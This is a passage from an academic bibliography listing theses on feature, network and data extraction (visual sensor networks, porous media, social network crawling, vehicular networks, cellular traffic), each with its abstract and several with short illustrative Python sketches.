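
clf = MLPClassifier(hidden_layer_sizes=(8,), max_iter=2000, random_state=0)
clf.fit(X, y)
print("training accuracy:", clf.score(X, y))
```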
APA, Harvard, Vancouver, ISO, and other styles
40

Guillén, Alejandro. "Implementation of a Distributed Algorithm for Multi-camera Visual Feature Extraction in a Visual Sensor Network Testbed." Thesis, KTH, Kommunikationsnät, 2015. http://urn.kb.se/resolve?urn=urn:nbn:se:kth:diva-167415.

Full text
Abstract:
Visual analysis tasks, like detection, recognition and tracking, are computationally intensive, and it is therefore challenging to perform such tasks in visual sensor networks, where nodes may be equipped with low-power CPUs. A promising solution is to augment the sensor network with processing nodes, and to distribute the processing tasks among the processing nodes of the visual sensor network. The objective of this project is to enable a visual sensor network testbed to operate with multiple camera sensors, and to implement an algorithm that computes the allocation of the visual feature tasks to the processing nodes. In the implemented system, the processing nodes can receive and process data from different camera sensors simultaneously. The acquired images are divided into sub-images; the sizes of the sub-images are computed by solving a linear programming problem. The implemented algorithm performs local optimization in each camera sensor without data exchange with the other cameras, in order to minimize the communication overhead and the computational load of the camera sensors. The implementation work is performed on a testbed that consists of BeagleBone Black computers with IEEE 802.15.4 or IEEE 802.11 USB modules, and the existing code base is written in C++. The implementation is used to assess the performance of the distributed algorithm in terms of completion time. The results show good performance, with lower average completion times.
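To give a feel for the kind of linear program involved, the sketch below splits an image's pixels among processing nodes so that the slowest node finishes as early as possible. The per-node rates and the single-resource model are assumptions; the testbed's actual formulation also accounts for communication costs and is solved locally on each camera.

```python
# Minimal sketch of a sub-image allocation LP: split pixels among processing
# nodes to minimise the completion time (makespan). Rates are made up.
import numpy as np
from scipy.optimize import linprog

total_pixels = 640 * 480
proc_time_per_pixel = np.array([2.0e-6, 1.0e-6, 4.0e-6])   # seconds, per node
n = proc_time_per_pixel.size

# Variables: x_1..x_n (pixels assigned to each node) and T (completion time).
# Minimise T  subject to  t_i * x_i - T <= 0  and  sum(x_i) = total_pixels.
c = np.concatenate([np.zeros(n), [1.0]])
A_ub = np.hstack([np.diag(proc_time_per_pixel), -np.ones((n, 1))])
b_ub = np.zeros(n)
A_eq = np.concatenate([np.ones(n), [0.0]]).reshape(1, -1)
b_eq = [total_pixels]
bounds = [(0, None)] * (n + 1)

res = linprog(c, A_ub=A_ub, b_ub=b_ub, A_eq=A_eq, b_eq=b_eq, bounds=bounds)
pixels, makespan = res.x[:n], res.x[-1]
print("pixels per node:", np.round(pixels).astype(int))
print(f"completion time: {makespan * 1e3:.1f} ms")
```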
APA, Harvard, Vancouver, ISO, and other styles
41

Rahimzadeh, Sheida, Veronica Ramirez, and Elizabeth Hall-Lipsy. "Evaluating Practice-Based Research Network (PBRN) Websites Using an Information Extraction Form and Interviews of Website Webmasters." The University of Arizona, 2013. http://hdl.handle.net/10150/614273.

Full text
Abstract:
Class of 2013 Abstract
Specific Aims: To evaluate and describe the Agency for Healthcare Research and Quality (AHRQ) affiliated practice-based research network (PBRN) websites to determine the best qualities regarding format, content, and accessibility using a developed PBRN website information extraction form. Methods: A PBRN information extraction form was developed to assess the format, content, and accessibility of each AHRQ-affiliated PBRN website. Each student investigator completed an electronic copy of the extraction form for each PBRN website to confirm consistency of findings. A phone interview was then conducted with the webmasters of the PBRNs with the highest scores to determine the influences and challenges those webmasters faced during the development of their PBRN websites. Main Results: The information extraction form was completed for each of the 104 active PBRN websites in the U.S. The most common elements seen on the PBRN websites were site map, email address, mission statement, phone number, and search toolbar. The inter-rater agreement between the two student investigators for the data collected was 84 percent. Regarding the webmaster interviews, the majority of the webmasters believed that the single most important factor in creating a successful PBRN website was identifying the audience of the PBRN and making the material appropriate for that audience. Conclusion: The developed information extraction form was used to successfully evaluate and describe the AHRQ-affiliated PBRN websites. Audience identification is important in order to provide appropriate content, as well as in the development of an effective PBRN website.
APA, Harvard, Vancouver, ISO, and other styles
42

Baychev, Todor. "Pore space structure effects on flow in porous media." Thesis, University of Manchester, 2018. https://www.research.manchester.ac.uk/portal/en/theses/pore-space-structure-effects-on-flow-in-porous-media(5542173d-d6d1-4768-9f38-4b41254fa194).html.

Full text
Abstract:
Fluid flow in porous media is important for a number of fields including nuclear waste disposal, oil and gas, fuel cells, water treatment and civil engineering. The aim of this work is to improve the current understanding of how the pore space governs the fluid flow in porous media in the context of nuclear waste disposal. The effects of biofilm formation on flow are also investigated. The thesis begins with a review of the current porous media characterisation techniques, the means for converting the pore space into pore network models, and their existing applications. Further, I review the current understanding of the biofilm lifecycle in the context of porous media and its interactions with fluid flow. The model porous medium used in this project is Hollington sandstone. The pore space of the material is characterised by X-ray CT, and the equivalent pore networks from two popular pore network extraction algorithms are compared comprehensively. The results indicate that different pore network extraction algorithms can interpret the same pore space rather differently. Despite these differences, the single-phase flow properties of the extracted networks are in good agreement with the estimates from a direct approach. However, it is recommended that any flow or transport study using pore network modelling should entail a sensitivity study aiming to determine whether the model results are extraction-method specific. Following these results, a pore merging algorithm is introduced, aimed at correcting the over-segmentation of long throats and hence improving the quality of the extracted statistics. The improved model is used to study quantitatively the pore space evolution of shale rock during pyrolysis. Next, the extracted statistics from one of the algorithms are used to explore the potential of regular pore network models for up-scaling the flow properties of porous materials. Analysis showed that the anisotropic flow properties observed in the irregular models are due to the different number of red (critical) features present along the flow direction. This observation is used to construct large regular models that can mimic that behaviour and to discuss the potential of estimating the flow properties of porous media based on their isotropic and anisotropic properties. Finally, a long-term flow-through column experiment is conducted, aimed at understanding the effects of bacterial colonisation on flow in Hollington sandstone. The results show that such systems are quite complex and are susceptible to perturbations. The flow properties of the sandstone were reduced significantly during the course of the experiment. The possible mechanisms responsible for the observed reductions in permeability are discussed, and the need for developing new imaging techniques that allow examining biofilm development in situ is underlined as necessary for drawing more definitive conclusions.
APA, Harvard, Vancouver, ISO, and other styles
43

Diesner, Jana. "Uncovering and Managing the Impact of Methodological Choices for the Computational Construction of Socio-Technical Networks from Texts." Research Showcase @ CMU, 2012. http://repository.cmu.edu/dissertations/194.

Full text
Abstract:
This thesis is motivated by the need for scalable and reliable methods and technologies that support the construction of network data based on information from text data. Ultimately, the resulting data can be used for answering substantive and graph-theoretical questions about socio-technical networks. One main limitation with constructing network data from text data is that the validation of the resulting network data can range from hard to infeasible, e.g. in the cases of covert, historical and large-scale networks. This thesis addresses this problem by identifying the impact of coding choices that must be made when extracting network data from text data on the structure of networks and network analysis results. My findings suggest that conducting reference resolution on text data can alter the identity and weight of 76% of the nodes and 23% of the links, and can cause major changes in the value of commonly used network metrics. Also, performing reference resolution prior to relation extraction leads to the retrieval of completely different sets of key entities in comparison to not applying this pre-processing technique. Based on the outcome of the presented experiments, I recommend strategies for avoiding or mitigating the identified issues in practical applications. When extracting socio-technical networks from texts, the set of relevant node classes might go beyond the classes that are typically supported by tools for named entity extraction. I address this lack of technology by developing an entity extractor that combines an ontology for socio-technical networks that originates from the social sciences, is theoretically grounded and has been empirically validated in prior work, with a supervised machine learning technique that is based on probabilistic graphical models. This thesis does not stop at showing that the resulting prediction models achieve state-of-the-art accuracy rates; I also describe the process of integrating these models into an existing and publicly available end-user product. As a result, users can apply these models to new text data in a convenient fashion. While a plethora of methods for building network data from information explicitly or implicitly contained in text data exists, there is a lack of research on how the resulting networks compare with respect to their structure and properties. This also applies to networks that can be extracted by using the aforementioned entity extractor as part of the relation extraction process. I address this knowledge gap by comparing the networks extracted by using this process to network data built with three alternative methods: text coding based on thesauri that associate text terms with node classes, the construction of network data from meta-data on texts, such as key words and index terms, and building network data in collaboration with subject matter experts. The outcomes of these comparative analyses suggest that thesauri generated with the entity extractor developed for this thesis need adjustments with respect to particular categories and types of errors. I provide tools and strategies to assist with these refinements. My results also show that, once these changes have been made and in contrast to manually constructed thesauri, the prediction models generalize with acceptable accuracy to other domains (news wire data, scientific writing, emails) and writing styles (formal, casual).
The comparisons of networks constructed with different methods show that ground truth data built by subject matter experts are hardly resembled by any automated method that analyzes text bodies, and even less so by exploiting existing meta-data from text corpora. Thus, aiming to reconstruct social networks from text data leads to largely incomplete networks. Synthesizing the findings from this work, I outline which types of information on socio-technical networks are best captured by what network data construction method, and how to best combine these methods in order to gain a more comprehensive view of a network. When both text data and relational data are available as a source of information on a network, people have previously integrated these data by enhancing social networks with content nodes that represent salient terms from the text data. I present a methodological advancement to this technique and test its performance on the datasets used for the previously mentioned evaluation studies. By using this approach, multiple types of behavioral data, namely interactions between people as well as their language use, can be taken into account. I conclude that extracting content nodes from groups of structurally equivalent agents can be an appropriate strategy for enabling the comparison of the content that people produce, perceive or disseminate. These equivalence classes can represent a variety of social roles and social positions that network members occupy. At the same time, extracting content nodes from groups of structurally coherent agents can be suitable for enabling the enhancement of social networks with content nodes. The results from applying the latter approach to text data include a comparison of the outcome of topic modeling, an efficient and unsupervised information extraction technique, to the outcomes of alternative methods, including entity extraction based on supervised machine learning. My findings suggest that key entities from meta-data knowledge networks might serve as proper labels for unlabeled topics. Also, unsupervised and supervised learning lead to the retrieval of similar entities as highly likely members of highly likely topics, and key nodes from text-based knowledge networks, respectively. In summary, the contributions made with this thesis help people to collect, manage and analyze rich network data at any scale. This is a precondition for asking substantive and graph-theoretical questions, testing hypotheses, and advancing theories about networks. This thesis uses an interdisciplinary and computationally rigorous approach to work towards this goal, thereby advancing the intersection of network analysis, natural language processing and computing.
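The toy example below illustrates the kind of coding choice studied in this thesis: a co-occurrence network is built from sentences with and without a simple form of reference resolution (a hand-made alias map), and node degrees are compared. The sentences and aliases are invented for the illustration and the alias map is a crude stand-in for a proper reference resolution component.

```python
# Toy illustration: co-occurrence network from sentences with and without
# reference resolution, showing how node identity and weight change.
from collections import defaultdict
from itertools import combinations

sentences = [
    ["Barack Obama", "White House"],
    ["Obama", "Congress"],
    ["the president", "White House"],
]
aliases = {"Obama": "Barack Obama", "the president": "Barack Obama"}

def cooccurrence_network(sentences, resolve=False):
    edges = defaultdict(int)
    for entities in sentences:
        if resolve:
            entities = [aliases.get(e, e) for e in entities]
        for a, b in combinations(sorted(set(entities)), 2):
            edges[(a, b)] += 1
    return edges

for resolve in (False, True):
    edges = cooccurrence_network(sentences, resolve)
    degree = defaultdict(int)
    for (a, b), w in edges.items():
        degree[a] += w
        degree[b] += w
    print("reference resolution:", resolve, dict(degree))
```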
APA, Harvard, Vancouver, ISO, and other styles
44

Abdulrahman, Ruqayya. "Multi agent system for web database processing, on data extraction from online social networks." Thesis, University of Bradford, 2012. http://hdl.handle.net/10454/5502.

Full text
Abstract:
In recent years, there has been a flood of continuously changing information from a variety of web resources such as web databases, web sites, web services and programs. Online Social Networks (OSNs) represent such a field, where huge amounts of information are being posted online over time. Because OSNs offer a productive source of qualitative and quantitative personal information, researchers from various disciplines contribute to developing methods for extracting data from them. However, there is limited research which addresses extracting data automatically. To the best of the author's knowledge, there is no research which focuses on tracking the real-time changes of information retrieved from OSN profiles over time, and this motivated the present work. This thesis presents different approaches for automated Data Extraction (DE) from OSNs: crawler, parser, Multi Agent System (MAS) and Application Programming Interface (API). Initially, a parser was implemented as a centralized system to traverse the OSN graph and extract the profile's attributes and list of friends from Myspace, the top OSN at that time, by parsing the Myspace profiles and extracting the relevant tokens from the parsed HTML source files. A Breadth First Search (BFS) algorithm was used to traverse the generated OSN friendship graph in order to select the next profile for parsing. The approach was implemented and tested on two types of friends: top friends and all friends. In the case of top friends, 500 seed profiles were visited and 298 public profiles were parsed to obtain 2197 top friends' profiles and 2747 friendship edges, while in the case of all friends, 250 public profiles were parsed to extract 10,196 friends' profiles and 17,223 friendship edges. This approach has two main limitations. First, the system is designed as a centralized system that controls and retrieves the information of each user's profile just once, which means that the extraction process will stop if the system fails to process one of the profiles, whether the seed profile (the first profile to be crawled) or one of its friends. To overcome this problem, an Online Social Network Retrieval System (OSNRS) is proposed to decentralize the DE process from OSNs through the use of a MAS. The novelty of OSNRS is its ability to monitor profiles continuously over time. The second challenge is that the parser had to be modified to cope with changes in the profiles' structure. To overcome this problem, the proposed OSNRS is improved through the use of an API tool to enable OSNRS agents to obtain the required fields of an OSN profile despite modifications in the representation of the profile's source web pages. The experimental work shows that using an API and a MAS simplifies and speeds up the process of tracking a profile's history. It also helps security personnel, parents, guardians, social workers and marketers in understanding the dynamic behaviour of OSN users. This thesis proposes solutions for web database processing and data extraction from OSNs through the use of a parser and a MAS, and discusses their limitations and possible improvements.
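The sketch below shows the BFS traversal idea in miniature: starting from a seed profile, friends are visited breadth-first and friendship edges are recorded. The get_friends function is a hypothetical placeholder standing in for the parser or API layer that fetched real profiles.

```python
# Minimal sketch of the BFS crawl: visit profiles breadth-first from a seed
# and record friendship edges. get_friends() is a toy stand-in for the layer
# that would parse profile pages or call an API.
from collections import deque

def get_friends(profile_id):
    # Hypothetical stand-in for parsing a profile page or calling an API.
    toy_graph = {"seed": ["a", "b"], "a": ["seed", "c"], "b": ["seed"], "c": ["a"]}
    return toy_graph.get(profile_id, [])

def bfs_crawl(seed, max_profiles=100):
    visited, edges = set(), set()
    queue = deque([seed])
    while queue and len(visited) < max_profiles:
        profile = queue.popleft()
        if profile in visited:
            continue
        visited.add(profile)
        for friend in get_friends(profile):
            edges.add(tuple(sorted((profile, friend))))
            if friend not in visited:
                queue.append(friend)
    return visited, edges

profiles, friendship_edges = bfs_crawl("seed")
print(len(profiles), "profiles,", len(friendship_edges), "friendship edges")
```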
APA, Harvard, Vancouver, ISO, and other styles
45

Hwang, Sungkun. "Predicting reliability in multidisciplinary engineering systems under uncertainty." Thesis, Georgia Institute of Technology, 2016. http://hdl.handle.net/1853/54955.

Full text
Abstract:
The proposed study develops a framework that can accurately capture and model input and output variables for multidisciplinary systems in order to mitigate the computational cost when uncertainties are involved. The dimension of the random input variables is reduced depending on the degree of correlation, calculated using relative entropy. Feature extraction methods, namely Principal Component Analysis (PCA) and the Auto-Encoder (AE) algorithm, are developed for the case where the input variables are highly correlated. The Independent Features Test (IndFeaT) is implemented as the feature selection method when the correlation is low, to select a critical subset of model features. Moreover, Artificial Neural Networks (ANNs), including the Probabilistic Neural Network (PNN), are integrated into the framework to correctly capture the complex response behavior of the multidisciplinary system at low computational cost. The efficacy of the proposed method is demonstrated with electro-mechanical engineering examples, including solder joint and stretchable patch antenna examples.
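A small sketch of the branching logic is given below: if the inputs are strongly correlated, they are reduced with PCA, otherwise a selected subset is kept. The mean absolute off-diagonal correlation and the 0.7 threshold are simple stand-ins for the relative-entropy criterion and IndFeaT selection described in the abstract.

```python
# Sketch of the branching idea: highly correlated inputs -> feature extraction
# (PCA); weakly correlated inputs -> feature selection. The correlation
# measure and threshold here are illustrative stand-ins.
import numpy as np
from sklearn.decomposition import PCA

rng = np.random.default_rng(0)
base = rng.normal(size=(500, 1))
X = np.hstack([base + 0.1 * rng.normal(size=(500, 1)) for _ in range(5)])

corr = np.corrcoef(X, rowvar=False)
off_diag = corr[~np.eye(corr.shape[0], dtype=bool)]
mean_abs_corr = np.abs(off_diag).mean()

if mean_abs_corr > 0.7:                                   # highly correlated
    reduced = PCA(n_components=0.95, svd_solver="full").fit_transform(X)
    print("PCA kept", reduced.shape[1], "components")      # keep 95% variance
else:
    print("low correlation: keep a selected subset of the original features")
```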
APA, Harvard, Vancouver, ISO, and other styles
46

Saunders, Gregory David. "The sequestration and detection of aqueous uranium using a novel network polymer." Thesis, University of York, 1999. http://ethos.bl.uk/OrderDetails.do?uin=uk.bl.ethos.323692.

Full text
APA, Harvard, Vancouver, ISO, and other styles
47

Nordström, Zacharias. "Extracting Behaviour Trees from Deep Q-Networks : Using learning from demostration to transfer knowledge between models." Thesis, Linköpings universitet, Artificiell intelligens och integrerade datorsystem, 2020. http://urn.kb.se/resolve?urn=urn:nbn:se:liu:diva-169858.

Full text
Abstract:
In recent years, advances in machine learning have solved more and more complex problems, but these techniques are still not commonly used in industry. One problem is that many of the techniques are black boxes: it is hard to analyse them to make sure that their behaviour is safe. This property makes them unsuitable for safety-critical systems. The goal of this thesis is to examine whether the deep learning technique Deep Q-network could be used to create a behaviour tree that can solve the same problem. A behaviour tree is a tree representation of a flow structure used for representing behaviours, often found in video games or robotics. To study the problem, two simulators are used: one models a cart that must balance a pole (cart pole); the other is a static world that needs to be navigated (grid world). Inspiration is taken from the learning-from-demonstration field: the Deep Q-network is used as a teacher from which a decision tree is created. During the creation of the decision tree, two attributes are used for pruning: the tree's accuracy or its performance. The thesis then compares three techniques, called Naive, BT Espresso, and BT Espresso Simplified, which are used to transform the extracted decision tree into a behaviour tree. In terms of performance, the created behaviour trees all manage to complete the simulator scenarios in the same, or close to the same, capacity as the trained Deep Q-network. The trees created from the performance-pruned decision tree are generally smaller and less complex, but they have worse accuracy. For cart pole, the trees created from the accuracy-pruned tree have around 10,000 nodes, while the performance-pruned trees have around 10-20 nodes. The difference in grid world is smaller, going from 35-45 nodes to 40-50 nodes. To get the smallest tree with the best performance, the performance-pruned tree should be used with the BT Espresso Simplified algorithm. This thesis has shown that it is possible to use knowledge from a trained Deep Q-network model to create a behaviour tree that can complete the same task.
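The teacher-student step can be sketched as follows: a trained Q-function labels sampled states with its greedy action, and a decision tree is fit to imitate it. Here greedy_action is a toy stand-in for a trained Deep Q-network, cost-complexity pruning stands in for the thesis's accuracy/performance pruning, and the conversion of the tree into a behaviour tree is not shown.

```python
# Minimal sketch of distilling a (stand-in) Q-network policy into a decision
# tree via imitation, then shrinking the tree with cost-complexity pruning.
import numpy as np
from sklearn.tree import DecisionTreeClassifier

def greedy_action(state):
    """Toy 'teacher' policy on a cart-pole-like state [x, x_dot, theta, theta_dot]."""
    return int(state[2] + 0.5 * state[3] > 0)   # push right if the pole falls right

rng = np.random.default_rng(0)
states = rng.uniform(-1.0, 1.0, size=(5000, 4))          # sampled observations
actions = np.array([greedy_action(s) for s in states])   # teacher demonstrations

# Fit trees with increasing pruning strength and watch size vs. agreement.
for alpha in [0.0, 1e-4, 1e-3, 1e-2]:
    pruned = DecisionTreeClassifier(ccp_alpha=alpha, random_state=0)
    pruned.fit(states, actions)
    acc = pruned.score(states, actions)
    print(f"ccp_alpha={alpha:g}: {pruned.tree_.node_count} nodes, "
          f"agreement with teacher = {acc:.3f}")
```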
APA, Harvard, Vancouver, ISO, and other styles
48

Chen, Yun. "Mining Dynamic Recurrences in Nonlinear and Nonstationary Systems for Feature Extraction, Process Monitoring and Fault Diagnosis." Scholar Commons, 2016. http://scholarcommons.usf.edu/etd/6072.

Full text
Abstract:
Real-time sensing brings a proliferation of big data that contains rich information about complex systems. It is well known that real-world systems show high levels of nonlinear and nonstationary behavior in the presence of extraneous noise. This makes it significantly challenging for human experts to visually inspect the integrity and performance of complex systems from the collected data. My research goal is to develop innovative methodologies for modeling and optimizing complex systems, and to create enabling technologies for real-world applications. Specifically, my research focuses on mining dynamic recurrences in nonlinear and nonstationary systems for feature extraction, process monitoring and fault diagnosis. This research will enable and assist in (i) sensor-driven modeling, monitoring and optimization of complex systems; (ii) integrating product design with system design of nonlinear dynamic processes; and (iii) creating better prediction and diagnostic tools for real-world complex processes. My research accomplishments include the following. (1) Feature Extraction and Analysis: I proposed a novel multiscale recurrence analysis to not only delineate recurrence dynamics in complex systems, but also resolve the computational issues for large-scale datasets. It was utilized to identify heart failure subjects from 24-hour heart rate variability (HRV) time series and to control the quality of mobile-phone-based electrocardiogram (ECG) signals. (2) Modeling and Prediction: I proposed the design of a stochastic sensor network that allows a subset of sensors at varying locations within the network to transmit dynamic information intermittently, and a new approach of sparse particle filtering to model the spatiotemporal dynamics of big data in the stochastic sensor network. It may be noted that the proposed algorithm is very general and is potentially applicable to stochastic sensor networks in a variety of disciplines, e.g., environmental sensor networks and battlefield surveillance networks. (3) Monitoring and Control: Process monitoring of dynamic transitions in complex systems is more concerned with aperiodic recurrences and heterogeneous types of recurrence variations. However, traditional recurrence analysis treats all recurrence states homogeneously, thereby failing to delineate heterogeneous recurrence patterns. I developed a new approach of heterogeneous recurrence analysis for complex systems informatics, process monitoring and anomaly detection. (4) Simulation and Optimization: Another line of research focuses on fractal-based simulation to study spatiotemporal dynamics on fractal surfaces of high-dimensional complex systems, and further to optimize spatiotemporal patterns. The proposed algorithm is applied to study reaction-diffusion modeling on fractal surfaces and real-world 3D heart surfaces.
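As a baseline illustration of recurrence analysis, the sketch below delay-embeds a time series, builds a thresholded recurrence matrix and reports the recurrence rate. The multiscale and heterogeneous extensions described in the abstract are not reproduced, and the embedding parameters and threshold are illustrative.

```python
# Basic recurrence analysis sketch: delay embedding, thresholded recurrence
# matrix, recurrence rate. Parameters are illustrative choices.
import numpy as np

def delay_embed(x, dim=3, lag=2):
    n = len(x) - (dim - 1) * lag
    return np.column_stack([x[i * lag:i * lag + n] for i in range(dim)])

def recurrence_matrix(x, dim=3, lag=2, radius=0.2):
    emb = delay_embed(np.asarray(x, dtype=float), dim, lag)
    dists = np.linalg.norm(emb[:, None, :] - emb[None, :, :], axis=-1)
    return dists <= radius

# Example: a noisy periodic signal (e.g. a heart-rate-like series).
t = np.linspace(0, 20 * np.pi, 800)
signal = np.sin(t) + 0.1 * np.random.default_rng(0).normal(size=t.size)

R = recurrence_matrix(signal, radius=0.3)
print(f"recurrence rate: {R.mean():.3f}")
```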
APA, Harvard, Vancouver, ISO, and other styles
49

Zekri, Dorsaf. "Agrégation et extraction des connaissances dans les réseaux inter-véhicules." Thesis, Evry, Institut national des télécommunications, 2013. http://www.theses.fr/2013TELE0001/document.

Full text
Abstract:
The work in this thesis focuses on data management in inter-vehicular networks (VANETs). These networks consist of a set of moving objects that communicate with each other over wireless links such as IEEE 802.11, Bluetooth, or Ultra Wide Band (UWB). With such communication mechanisms, a vehicle may receive information from its close neighbours or from more remote ones, thanks to multi-hop techniques that use intermediate objects as relays. A lot of information can be exchanged in the context of VANETs, especially to alert drivers when an event occurs (an accident, emergency braking, a vehicle leaving a parking space and wanting to inform others, etc.). As they move, vehicles are then 'contaminated' by the information transmitted by others. In this work, we exploit the data in a substantially different way from existing work, which uses the exchanged data to produce alerts for drivers; once used, those data become obsolete and are destroyed. Here, we seek to generate dynamically, from the data collected by vehicles along their routes, a summary (or aggregate) that provides information to drivers, including when no communicating vehicle is nearby. To do this, we first propose a spatio-temporal aggregation structure enabling a vehicle to summarise the set of observed events. Next, we define a protocol for exchanging summaries between vehicles without the mediation of an infrastructure, allowing a vehicle to improve its local knowledge base through exchanges with its neighbours. Finally, we define strategies for exploiting the summary in order to assist the driver in making decisions. We validated all of our proposals using the VESPA simulator, extending it to take the concept of summaries into account. Simulation results show that our approach can effectively help drivers make good decisions without the need for a centralised infrastructure.
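A toy picture of such a spatio-temporal summary is sketched below: event counts per (grid cell, time slot, event type), with a merge operation standing in for the exchange of summaries between two vehicles. The grid and slot sizes and the event types are illustrative; the thesis defines its own aggregation structure and exchange protocol.

```python
# Toy sketch of a spatio-temporal summary and of merging two vehicles'
# summaries. Resolutions and event types are illustrative assumptions.
from collections import Counter

CELL_SIZE_M = 200.0      # spatial resolution of the summary
SLOT_SIZE_S = 600.0      # temporal resolution of the summary

def summarize(events):
    """events: iterable of (x_m, y_m, t_s, event_type)."""
    summary = Counter()
    for x, y, t, kind in events:
        key = (int(x // CELL_SIZE_M), int(y // CELL_SIZE_M),
               int(t // SLOT_SIZE_S), kind)
        summary[key] += 1
    return summary

def merge(own, received):
    """Combine a neighbour's summary into the local knowledge base."""
    return own + received          # Counter addition sums counts per key

vehicle_a = summarize([(120, 450, 30, "braking"), (130, 460, 35, "braking")])
vehicle_b = summarize([(125, 455, 640, "parking_spot_freed")])
print(merge(vehicle_a, vehicle_b))
```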
APA, Harvard, Vancouver, ISO, and other styles
50

Kurien, Anish Mathew. "Approches pour la classification du trafic et l’optimisation des ressources radio dans les réseaux cellulaires : application à l’Afrique du Sud." Thesis, Paris Est, 2012. http://www.theses.fr/2012PEST1090/document.

Full text
Abstract:
The growth in the number of cellular mobile subscribers worldwide has far outpaced expected rates, with mobile subscriptions reaching 6 billion in 2011 according to the International Telecommunication Union (ITU), more than 75% of them in developing countries. With this rate of growth, greater pressure is placed on radio resources in mobile networks, which impacts the quality and grade of service (GoS) in the network. With varying demands generated by different subscriber classes, the ability to distinguish between subscriber types in a network is vital for optimising infrastructure and resources in a mobile network. In this study, a new approach for subscriber classification in mobile cellular networks is proposed. In the proposed approach, traffic data extracted from two network providers in South Africa is considered. The traffic data is first decomposed using traditional feature extraction approaches such as Empirical Mode Decomposition (EMD) and the Discrete Wavelet Packet Transform (DWPT). The results are then compared with the Difference Histogram approach, which considers the number of segments of increase in the time series. Based on the features extracted, classification is achieved using a Fuzzy C-means algorithm. The results show that a clear separation between subscriber classes, based on the inputted traffic signals, is possible through the proposed approach. Further, based on the subscriber classes extracted, a novel two-level hybrid channel allocation approach is proposed that makes use of a Mixed Integer Linear Programming (MILP) model to optimise radio resources in a mobile network. In the proposed model, two levels of channel allocation are considered: the first defines a fixed threshold of channels allocated to each cell in the network, while the second considers a dynamic channel allocation model to account for the variations in traffic experienced in each identified traffic class. Using the optimisation solver CPLEX, it is shown that an optimal solution can be achieved with the proposed two-level hybrid allocation model.
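To illustrate the classification step, the sketch below computes two simple per-subscriber traffic features (mean level and a difference-histogram-style count of increasing segments) and clusters them with a small hand-written Fuzzy C-means. The features are crude stand-ins for the EMD/DWPT decompositions used in the study, and the synthetic traffic and parameters are assumptions.

```python
# Sketch of the classification step: simple traffic features clustered with a
# hand-written Fuzzy C-means. Features and data are illustrative stand-ins.
import numpy as np

def fuzzy_c_means(X, n_clusters=2, m=2.0, n_iter=100, seed=0):
    rng = np.random.default_rng(seed)
    u = rng.random((len(X), n_clusters))
    u /= u.sum(axis=1, keepdims=True)              # random initial memberships
    for _ in range(n_iter):
        w = u ** m
        centers = (w.T @ X) / w.sum(axis=0)[:, None]
        dist = np.linalg.norm(X[:, None, :] - centers[None, :, :], axis=-1) + 1e-9
        inv = 1.0 / dist ** (2.0 / (m - 1.0))
        u = inv / inv.sum(axis=1, keepdims=True)   # standard FCM membership update
    return centers, u

rng = np.random.default_rng(1)
# Hypothetical hourly traffic for two subscriber classes (low and high usage).
low = rng.poisson(5, size=(20, 24))
high = rng.poisson(40, size=(20, 24))
traffic = np.vstack([low, high]).astype(float)

features = np.column_stack([
    traffic.mean(axis=1),                          # average traffic level
    (np.diff(traffic, axis=1) > 0).sum(axis=1),    # number of increasing segments
])
centers, memberships = fuzzy_c_means(features, n_clusters=2)
print("cluster centres:\n", np.round(centers, 1))
print("first subscriber memberships:", np.round(memberships[0], 2))
```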
APA, Harvard, Vancouver, ISO, and other styles
